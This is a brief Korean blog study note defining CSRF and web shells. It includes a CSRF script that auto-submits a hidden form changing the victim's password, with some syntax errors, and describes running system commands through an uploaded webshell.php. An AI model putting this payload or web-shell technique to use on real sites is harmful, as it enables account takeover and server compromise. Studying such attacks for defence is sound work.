Wednesday, November 21, 2018

CSRF 과 웹쉘

Cross Site Request Forgery


CSRF 공격은 로그온 된 피해자의 취약한 웹 애플리케이션에 피해자의 세션 쿠키와 기타 다른 인증정보를 자동으로 포함하여 위조된 HTTP 요청을 강제로 보내도록 하는 것이다.
이것은 공격자가 취약한 애플리케이션이 피해자로부터의 정당한 요청이라고 오해할 수 있는 요청들을 강제로 만들 수 있다.

  1. 악성스크립트 삽입

   (단축어를 사용할수록 해독하기 어려움)
     <script>var f= document.createElement("form");f.setAttribute("action","POST");
      f.setAttribute ("action","user_info_update.php");varh=document.createElement
      ("input");h.setAttribute("type","hidden");h.setAttribute("name","m_pw");
      h.setAttribute("value","1004");f.appendchild(h);document.body.appendchild(f);
      f.submit();</script>

   2. 악성스크립트를 읽고, 다운로드, 저장

   3. 악성스크립트 실행


Web Shell

shell; 사용자와 kernell사이에 인터페이스를 제공

   Web에서 리눅스 명령어를 입력하면 실행됨 (system($cmd1))
   updike.html & upfile.php 에 webshell.php(file)을 업로드해 확인
2018-10-26

No comments:

Post a Comment

List

MobSF

MobSF는 오픈소스 모바일 앱 자동 보안 진단 프레임워크로 자동 분석 시스템 구축할 때 사용한다. 정정 및 동적 분석이 가능하며, Android, iOS, Windows에 대해 침투 테스트, 멀웨어 분석 및 보안 평가를 할 수 있다. 참고자료 필...